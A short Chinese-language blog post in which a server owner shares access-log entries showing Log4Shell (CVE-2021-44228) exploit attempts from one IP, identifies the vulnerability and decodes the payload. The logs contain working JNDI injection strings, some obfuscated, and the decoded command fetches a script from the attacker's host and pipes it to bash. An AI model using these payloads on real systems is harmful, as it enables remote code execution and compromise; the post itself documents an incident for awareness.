這個月出現了不少奇怪的 Log, 都是從 195.54.160.149 這個 IP 過來的, 貼上一串看看:
195.54.160.149 - - [31/Dec/2021:11:17:10 +0800] "GET /?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8xNzUuMTgyLjExMi4yNDE6ODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvMTc1LjE4Mi4xMTIuMjQxOjgwKXxiYXNo} HTTP/1.1" 200 1833 "${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8xNzUuMTgyLjExMi4yNDE6ODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvMTc1LjE4Mi4xMTIuMjQxOjgwKXxiYXNo}" "${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8xNzUuMTgyLjExMi4yNDE6ODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvMTc1LjE4Mi4xMTIuMjQxOjgwKXxiYXNo}"
問了估狗大神之後, 得知這是一個 Apache Log4j, Log4Shell 零時攻擊漏洞(CVE 2021-44228), 這是一個 Apache Java 套件中的漏洞, 藉由 Log 中字串遠端程式碼執行, 從上面那串 Log 他用了三個命令來確保能連到 195.54.160.149:12344 去執行後面那段加密過的文字
KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8xNzUuMTgyLjExMi4yNDE6ODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvMTc1LjE4Mi4xMTIuMjQxOjgwKXxiYXNo 經過解密之後得到:
(curl -s 195.54.160.149:5874/IP:80||wget -q -O- 195.54.160.149:5874/IP:80)|bash
其中的 IP 為我的主機 IP, 不過我的主機裡面沒有他要的東西
看網路上有人在分析這個 195.54.160.149 應該也只是個跳板, 查詢後得知來自俄羅斯
沒有留言:
張貼留言